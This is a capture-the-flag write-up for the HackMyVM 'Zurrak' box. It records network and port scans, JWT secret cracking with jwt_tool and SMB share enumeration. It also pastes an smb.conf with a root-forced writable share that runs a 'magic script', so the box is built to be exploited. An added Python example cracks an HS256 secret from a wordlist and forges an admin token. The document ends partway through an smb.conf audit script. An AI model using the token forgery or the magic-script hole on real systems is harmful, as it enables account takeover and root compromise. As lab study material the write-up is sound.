
hackmyvm Zurrak box write-up

Difficulty: Medium


Network scan

root@LingMj:/home/lingmj/xxoo# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:df:e2:a7, IPv4: 192.168.56.110
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:12       (Unknown: locally administered)
192.168.56.100  08:00:27:a3:c4:7b       PCS Systemtechnik GmbH
192.168.56.140  08:00:27:f7:cd:f1       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.355 seconds (108.70 hosts/sec). 3 responded

Port scan

root@LingMj:/home/lingmj/xxoo# nmap -p- -sC -sV 192.168.56.140        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 06:46 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.140
Host is up (0.012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.57 ((Debian))
| http-title: Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.57 (Debian)
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
5432/tcp open  postgresql  PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after:  2033-10-17T19:29:16
| fingerprint-strings: 
|   SMBProgNeg: 
|     SFATAL
|     VFATAL
|     C0A000
|     Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
|     Fpostmaster.c
|     L2195
|_    RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=2/6%Time=67A4A16C%P=x86_64-pc-linux-gnu%r(
SF:SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20front
SF:end\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x2
SF:03\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:F7:CD:F1 (Oracle VirtualBox virtual NIC)

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 7h59m58s
| smb2-time: 
|   date: 2025-02-06T19:48:02
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.30 seconds

Getting a webshell

[Figures 0-4]

Ah, why is there so little information?

[Figures 5-15]

URL: https://github.com/ticarpi/jwt_tool

[Figure 16]

root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -jw /usr/share/wordlists/rockyou.txt 

        \   \        \         \          \                    \ 
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.2.7                \______|             @ticarpi      

No config file yet created.
Running config setup.
Configuration file built - review contents of "jwtconf.ini" to customise your options.
Make sure to set the "httplistener" value to a URL you can monitor to enable out-of-band checks.
                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -kf /usr/share/wordlists/rockyou.txt


Original JWT: 

=====================
Decoded Token Values:
=====================

Token header values:
[+] typ = "JWT"
[+] alg = "HS256"

Token payload values:
[+] email = "internal@zurrak.htb"
[+] isAdmin = True
[+] iat = 1356999524    ==> TIMESTAMP = 2012-12-31 19:18:44 (UTC)
[+] nbf = 1357000000    ==> TIMESTAMP = 2012-12-31 19:26:40 (UTC)

Seen timestamps:
[*] iat was seen
[*] nbf is later than iat by: 0 days, 0 hours, 7 mins

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -p /usr/share/wordlists/rockyou.txt


Original JWT: 

=====================
Decoded Token Values:
=====================

Token header values:
[+] typ = "JWT"
[+] alg = "HS256"

Token payload values:
[+] email = "internal@zurrak.htb"
[+] isAdmin = True
[+] iat = 1356999524    ==> TIMESTAMP = 2012-12-31 19:18:44 (UTC)
[+] nbf = 1357000000    ==> TIMESTAMP = 2012-12-31 19:26:40 (UTC)

Seen timestamps:
[*] iat was seen
[*] nbf is later than iat by: 0 days, 0 hours, 7 mins

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.GZiD9dJTb0NTJtHftOE01HXTVTW2arpE-w-xgWEJwZQ -C -d /usr/share/wordlists/rockyou.txt


Original JWT: 

[*] Tested 1 million passwords so far
[*] Tested 2 million passwords so far
[*] Tested 3 million passwords so far
[*] Tested 4 million passwords so far
[*] Tested 5 million passwords so far
^C^C^C^C^C^C[*] Tested 6 million passwords so far
[*] Tested 7 million passwords so far
[*] Tested 8 million passwords so far
[*] Tested 9 million passwords so far
[*] Tested 10 million passwords so far
[*] Tested 11 million passwords so far
[*] Tested 12 million passwords so far
[*] Tested 13 million passwords so far
[*] Tested 14 million passwords so far
[-] Key not in dictionary

===============================
As your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.
hashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:

[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt
[*] rule-based attack:  hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule
[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6
===============================

                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo1/jwt_tool# python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9.ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso -C -d /usr/share/wordlists/rockyou.txt


Original JWT: 

[*] Tested 1 million passwords so far
[*] Tested 2 million passwords so far
[+] TEST123 is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "TEST123"

[Figures 17-18]

cookie:token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY
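A note on the jwt_tool runs above: the first three invocations selected no attack mode and only decoded the token; `-C -d <wordlist>` is the crack mode. Against the isAdmin:true token it ran through all of rockyou without a hit, while the isAdmin:false token cracked as `TEST123`. The cookie above carries the same header and payload as the isAdmin:true token but a new signature, i.e. it was re-signed with the recovered secret. The block below is an added example, not code from the write-up or from jwt_tool, showing the same two steps in plain Python: try each candidate as the HMAC-SHA256 key over `header.payload`, then patch a claim and sign again. The token is the isAdmin:false one copied from the write-up; the five-entry candidate list is constructed here to stand in for rockyou.txt.

```python
"""Recover an HS256 JWT secret by dictionary attack, then re-sign a modified
payload. Added example for this write-up; not code from the page or from
jwt_tool. The token is the isAdmin:false one copied from the write-up; the
candidate list is constructed here to stand in for rockyou.txt."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_decode(s: str) -> bytes:
    """JWTs strip base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def hs256_signature(signing_input: bytes, key: str) -> str:
    """HS256 is HMAC-SHA256 over 'header.payload' keyed with the raw secret."""
    return b64url_encode(hmac.new(key.encode(), signing_input, hashlib.sha256).digest())


def decode_header(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def decode_payload(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, key: str) -> bool:
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hs256_signature(f"{header_b64}.{payload_b64}".encode(), key)
    return hmac.compare_digest(expected, sig_b64)


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose HMAC reproduces the token's signature."""
    if decode_header(token).get("alg") != "HS256":
        raise ValueError("not an HS256 token; a wordlist attack does not apply")
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    for cand in candidates:
        cand = cand.rstrip("\r\n")  # wordlist lines keep their newline
        if hmac.compare_digest(hs256_signature(signing_input, cand), sig_b64):
            return cand
    return None


def forge_hs256(token: str, key: str, **changes) -> str:
    """Keep the original header, patch claims in the payload, sign with the recovered key."""
    header_b64 = token.split(".")[0]
    payload = decode_payload(token)
    payload.update(changes)
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header_b64}.{payload_b64}"
    return f"{signing_input}.{hs256_signature(signing_input.encode(), key)}"


# Copied from the write-up: the token jwt_tool cracked as TEST123.
LOW_PRIV_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9."
    "ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso"
)

# Constructed stand-in for rockyou.txt (jwt_tool found the key about 2 million lines in).
CANDIDATES = ["password\n", "123456\n", "test123\n", "TEST123\n", "admin\n"]


def run_demo() -> Optional[str]:
    """Crack the secret and return a forged isAdmin:true token, or None."""
    key = crack_hs256(LOW_PRIV_TOKEN, CANDIDATES)
    if key is None:
        return None
    return forge_hs256(LOW_PRIV_TOKEN, key, isAdmin=True)


if __name__ == "__main__":
    print(run_demo())
```

Two details matter in practice: the comparison uses `hmac.compare_digest` rather than `==`, and the candidate's trailing newline is stripped, since a wordlist read line by line would otherwise never match. For a real wordlist, replace `CANDIDATES` with `open("/usr/share/wordlists/rockyou.txt", errors="ignore")`; hashcat mode 16500 (as jwt_tool suggests) is much faster for long lists.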

root@LingMj:/home/lingmj/xxoo# exiftool zurrakhorse.jpg 
ExifTool Version Number         : 12.76
File Name                       : zurrakhorse.jpg
Directory                       : .
File Size                       : 674 kB
File Modification Date/Time     : 2023:10:24 13:03:45-04:00
File Access Date/Time           : 2025:02:06 07:48:12-05:00
File Inode Change Date/Time     : 2025:02:06 07:48:12-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Adobe Photoshop CC 2018 (Windows)
Modify Date                     : 2023:10:24 20:02:16
Color Space                     : sRGB
Exif Image Width                : 2000
Exif Image Height               : 2068
Compression                     : JPEG (old-style)
Thumbnail Offset                : 318
Thumbnail Length                : 4962
IPTC Digest                     : 00000000000000000000000000000000
Displayed Units X               : inches
Displayed Units Y               : inches
Print Style                     : Centered
Print Position                  : 0 0
Print Scale                     : 1
Global Angle                    : 90
Global Altitude                 : 30
URL List                        : 
Slices Group Name               : Untitled-1
Num Slices                      : 1
Pixel Aspect Ratio              : 1
Photoshop Thumbnail             : (Binary data 4962 bytes, use -b option to extract)
Has Real Merged Data            : Yes
Writer Name                     : Adobe Photoshop
Reader Name                     : Adobe Photoshop CC 2018
Photoshop Quality               : 12
Photoshop Format                : Standard
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2023:10:24 20:02:16+03:00
Metadata Date                   : 2023:10:24 20:02:16+03:00
Instance ID                     : xmp.iid:d3c42f7a-fc08-564b-9680-0732f5c21a40
Document ID                     : adobe:docid:photoshop:c103a364-af37-f544-81a7-31dc1bd0ec79
Original Document ID            : xmp.did:a2b7154c-9def-2f41-9d90-56f8411511de
Format                          : image/jpeg
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
History Action                  : created, saved
History Instance ID             : xmp.iid:a2b7154c-9def-2f41-9d90-56f8411511de, xmp.iid:d3c42f7a-fc08-564b-9680-0732f5c21a40
History When                    : 2023:10:24 20:02:16+03:00, 2023:10:24 20:02:16+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version              : 100
APP14 Flags 0                   : [14]
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 2000
Image Height                    : 2068
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 2000x2068
Megapixels                      : 4.1
Thumbnail Image                 : (Binary data 4962 bytes, use -b option to extract)
                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo# exiftool zurrakhearts.jpg 
ExifTool Version Number         : 12.76
File Name                       : zurrakhearts.jpg
Directory                       : .
File Size                       : 2.9 MB
File Modification Date/Time     : 2023:10:24 13:41:37-04:00
File Access Date/Time           : 2025:02:06 07:48:38-05:00
File Inode Change Date/Time     : 2025:02:06 07:48:38-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 5000
Image Height                    : 4875
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 5000x4875
Megapixels                      : 24.4
                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo# exiftool zurraksnake.jpg 
ExifTool Version Number         : 12.76
File Name                       : zurraksnake.jpg
Directory                       : .
File Size                       : 771 kB
File Modification Date/Time     : 2023:10:24 13:03:45-04:00
File Access Date/Time           : 2025:02:06 07:48:28-05:00
File Inode Change Date/Time     : 2025:02:06 07:48:28-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Adobe Photoshop CC 2018 (Windows)
Modify Date                     : 2023:10:24 20:02:59
Color Space                     : sRGB
Exif Image Width                : 2000
Exif Image Height               : 2113
Compression                     : JPEG (old-style)
Thumbnail Offset                : 318
Thumbnail Length                : 6114
IPTC Digest                     : 00000000000000000000000000000000
Displayed Units X               : inches
Displayed Units Y               : inches
Print Style                     : Centered
Print Position                  : 0 0
Print Scale                     : 1
Global Angle                    : 90
Global Altitude                 : 30
URL List                        : 
Slices Group Name               : Untitled-1
Num Slices                      : 1
Pixel Aspect Ratio              : 1
Photoshop Thumbnail             : (Binary data 6114 bytes, use -b option to extract)
Has Real Merged Data            : Yes
Writer Name                     : Adobe Photoshop
Reader Name                     : Adobe Photoshop CC 2018
Photoshop Quality               : 12
Photoshop Format                : Standard
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2023:10:24 20:02:59+03:00
Metadata Date                   : 2023:10:24 20:02:59+03:00
Instance ID                     : xmp.iid:55ce4063-a1ae-2445-839f-9555816e0bbc
Document ID                     : adobe:docid:photoshop:90b830b4-61fe-5b45-9d2e-7fb64a62c211
Original Document ID            : xmp.did:32726908-a22b-404b-8560-081a5437a5cb
Format                          : image/jpeg
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
History Action                  : created, saved
History Instance ID             : xmp.iid:32726908-a22b-404b-8560-081a5437a5cb, xmp.iid:55ce4063-a1ae-2445-839f-9555816e0bbc
History When                    : 2023:10:24 20:02:59+03:00, 2023:10:24 20:02:59+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version              : 100
APP14 Flags 0                   : [14]
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 2000
Image Height                    : 2113
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 2000x2113
Megapixels                      : 4.2
Thumbnail Image                 : (Binary data 6114 bytes, use -b option to extract)
                                                                                                                                                                                                                
root@LingMj:/home/lingmj/xxoo# 

[Figures 19-23]

I'm not good at reading this stuff; fine, I'll click through them one by one. No information so far; the hint is SMB brute-force.

[Figures 24-25]

Got a result.

[Figure 26]

The scan didn't find this directory; otherwise I'd have tried them one by one.

[Figure 27]

I think I get it.

[Figure 28]

ok

smb: \> dir
  .                                   D        0  Fri Oct 20 17:14:00 2023
  ..                                  D        0  Fri Oct 20 16:36:51 2023
  DONTDELETE                          D        0  Fri Oct 20 23:44:44 2023
  operations                          D        0  Sat Oct 21 00:04:30 2023
  backup.reg                          N     1792  Sun Jul 24 01:30:09 2011
  human_resources                     D        0  Sun Apr  2 01:30:09 2017
  launch_options.txt                  N       21  Tue Dec 13 22:55:16 2022

                9232860 blocks of size 1024. 5935824 blocks available
smb: \> cd DONTDELETE\
smb: \DONTDELETE\> dir
  .                                   D        0  Fri Oct 20 23:44:44 2023
  ..                                  D        0  Fri Oct 20 17:14:00 2023
  eric                                D        0  Fri Oct 20 23:45:22 2023
  New folder                          D        0  Fri Oct 20 23:43:30 2023

                9232860 blocks of size 1024. 5935824 blocks available
smb: \DONTDELETE\> cd eric\
smb: \DONTDELETE\eric\> dir 
  .                                   D        0  Fri Oct 20 23:45:22 2023
  ..                                  D        0  Fri Oct 20 23:44:44 2023
  190709234924.BMP                    N  2359350  Tue Jul  9 23:49:48 2019
  bios                                N     1586  Sun Jul  7 20:06:20 2019
  biosoc2                             N  4194304  Mon Aug 19 20:47:38 2019
  New Text Document.txt               N        0  Fri Oct 20 23:44:48 2023
  190709234911.BMP                    N  2359350  Tue Jul  9 23:49:22 2019
  biosoc                              N  4194304  Sun Jul  7 20:06:56 2019
  190709234935.BMP                    N  2359350  Tue Jul  9 23:49:06 2019

                9232860 blocks of size 1024. 5935824 blocks available
smb: \DONTDELETE\eric\> cd ..
smb: \DONTDELETE\> cd New folder\
cd \DONTDELETE\New\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \DONTDELETE\> cd ..
smb: \> dir 
  .                                   D        0  Fri Oct 20 17:14:00 2023
  ..                                  D        0  Fri Oct 20 16:36:51 2023
  DONTDELETE                          D        0  Fri Oct 20 23:44:44 2023
  operations                          D        0  Sat Oct 21 00:04:30 2023
  backup.reg                          N     1792  Sun Jul 24 01:30:09 2011
  human_resources                     D        0  Sun Apr  2 01:30:09 2017
  launch_options.txt                  N       21  Tue Dec 13 22:55:16 2022

                9232860 blocks of size 1024. 5935824 blocks available
smb: \> cd operations\
smb: \operations\> dir
  .                                   D        0  Sat Oct 21 00:04:30 2023
  ..                                  D        0  Fri Oct 20 17:14:00 2023
  binaries                            D        0  Tue Nov 14 04:08:42 2023
  operators.txt                       N      118  Tue Dec 18 01:30:09 2001
  New folder                          D        0  Tue Dec 18 01:30:09 2001

                9232860 blocks of size 1024. 5935824 blocks available
smb: \operations\> get operators.txt
getting file \operations\operators.txt of size 118 as operators.txt (5.8 KiloBytes/sec) (average 5.8 KiloBytes/sec)
smb: \operations\> cd binaries\
smb: \operations\binaries\> dir
  .                                   D        0  Tue Nov 14 04:08:42 2023
  ..                                  D        0  Sat Oct 21 00:04:30 2023
  WinSCP-6.1.1-Setup.exe              N 11120192  Tue Dec 18 01:30:09 2001
  python-3.12.0-amd64.exe             N 26507904  Tue Dec 18 01:30:09 2001
  LAPS.x64.msi                        N  1118208  Tue Dec 18 01:30:09 2001

                9232860 blocks of size 1024. 5935824 blocks available
smb: \operations\binaries\> cd ..
smb: \operations\> ls
  .                                   D        0  Sat Oct 21 00:04:30 2023
  ..                                  D        0  Fri Oct 20 17:14:00 2023
  binaries                            D        0  Tue Nov 14 04:08:42 2023
  operators.txt                       N      118  Tue Dec 18 01:30:09 2001
  New folder                          D        0  Tue Dec 18 01:30:09 2001

                9232860 blocks of size 1024. 5935824 blocks available
smb: \operations\> cd New folder\
cd \operations\New\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \operations\> cd ..
smb: \> ls
  .                                   D        0  Fri Oct 20 17:14:00 2023
  ..                                  D        0  Fri Oct 20 16:36:51 2023
  DONTDELETE                          D        0  Fri Oct 20 23:44:44 2023
  operations                          D        0  Sat Oct 21 00:04:30 2023
  backup.reg                          N     1792  Sun Jul 24 01:30:09 2011
  human_resources                     D        0  Sun Apr  2 01:30:09 2017
  launch_options.txt                  N       21  Tue Dec 13 22:55:16 2022

                9232860 blocks of size 1024. 5935824 blocks available
smb: \> cd human_resources\
smb: \human_resources\> idr
idr: command not found
smb: \human_resources\> dir
  .                                   D        0  Sun Apr  2 01:30:09 2017
  ..                                  D        0  Fri Oct 20 17:14:00 2023
  employees.csv                       N     4750  Fri Oct 20 23:49:46 2023
  status.txt                          N       42  Fri Oct 20 23:51:28 2023

                9232860 blocks of size 1024. 5935824 blocks available
smb: \human_resources\> get employees.csv 
getting file \human_resources\employees.csv of size 4750 as employees.csv (210.8 KiloBytes/sec) (average 113.2 KiloBytes/sec)
smb: \human_resources\> get status.txt    
getting file \human_resources\status.txt of size 42 as status.txt (3.2 KiloBytes/sec) (average 87.2 KiloBytes/sec)
smb: \human_resources\> cd ..
smb: \> dir
  .                                   D        0  Fri Oct 20 17:14:00 2023
  ..                                  D        0  Fri Oct 20 16:36:51 2023
  DONTDELETE                          D        0  Fri Oct 20 23:44:44 2023
  operations                          D        0  Sat Oct 21 00:04:30 2023
  backup.reg                          N     1792  Sun Jul 24 01:30:09 2011
  human_resources                     D        0  Sun Apr  2 01:30:09 2017
  launch_options.txt                  N       21  Tue Dec 13 22:55:16 2022

                9232860 blocks of size 1024. 5935824 blocks available
smb: \> get launch_options.txt

[Figures 29-32]

Still can't get into this directory.

[Figures 33-34]

Out of ideas here, so I took a look at another write-up (小白 wp).

[Figures 35-40]

Got lazy and just grepped through this part; I also tried the account and password from above, but there's no matching port.

[Figures 41-48]

[Figure 49]

There's still one port I haven't used.

[Figures 50-51]

There's a PoC, so just use the PoC.

[Figure 52]

Privilege escalation

[Figures 53-56]

No way it's attacking itself, right?

[Figure 57]

[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no

[share]
comment = "zurrak operations share"
path = /opt/smbshare
hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli

[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh
postgres@zurrak:/home/postgres$ 
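What the `[internal]` share above actually grants: `writable = yes` together with `force user = root` means every file written through the share is created on disk as root, and `magic script = emergency.sh` tells smbd to execute a file of that name, as the share's effective user (root here), as soon as the client closes it after uploading. `hosts allow = 127.0.0.1` and `valid users = emre` limit this to connections made from the box itself and authenticated as emre, which is why a foothold on the host and emre's Samba password are both needed. The block below is an added audit example, not code from the write-up and not part of Samba: it parses the excerpt (embedded as a constructed copy of the page's smb.conf lines) with the standard-library configparser and flags exactly these combinations. It is a configuration check, not an exploit.

```python
"""Flag privilege-escalation footguns in smb.conf share definitions.

Added example for this write-up, not the page's own code and not part of
Samba. The input below is a constructed copy of the smb.conf excerpt shown
on the page."""
import configparser
from typing import Dict, List, Tuple

SMB_CONF = """\
[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no

[share]
comment = "zurrak operations share"
path = /opt/smbshare
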